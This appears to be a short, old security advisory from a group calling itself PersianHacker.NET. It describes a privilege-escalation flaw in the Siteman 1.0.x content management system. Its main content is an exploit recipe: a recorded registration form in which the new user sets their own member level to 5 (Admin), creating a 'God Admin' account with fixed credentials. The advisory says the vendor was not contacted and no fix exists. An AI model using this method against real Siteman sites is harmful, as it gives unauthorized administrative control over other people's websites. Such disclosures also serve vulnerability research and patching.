God Admin Injection Vulnerability in Siteman 1.0.x,
Discovered by PersianHacker.NET Security Team
by amironline452 (amironline452 hotmail com)
http://www.PersianHacker.NET
http://www.amironline452.tk
Siteman is a Content Management System (CMS) that is so easy to install and use, that
a person who has no knowledge about creating homepages can get a professionally
looking website up and running in just minutes.
More info @
http://sitem.sourceforge.net/
http://sourceforge.net/projects/sitem/
Discussion:
With this vulnerability you can create a God Admin user in Siteman v1.0.x.
Exploit:
These data were recorded.
Username (Use this, and not your display name, when logging in) | amir452 |
Password | |
Secret Question (Asked when you forget your password) | amir452 |
Answer to secret question | |
Display name | amir452 |
Member Level | 5 (Admin) |
email | amir452@amir452.com |
Hide my email adress | no |
Forum Signature | hackers |
Is this correct?
The above exploit creates a God Admin user with the following info:
username: amir452
password: amir452
Note:
Script authors not contacted.
There is no solution at this time.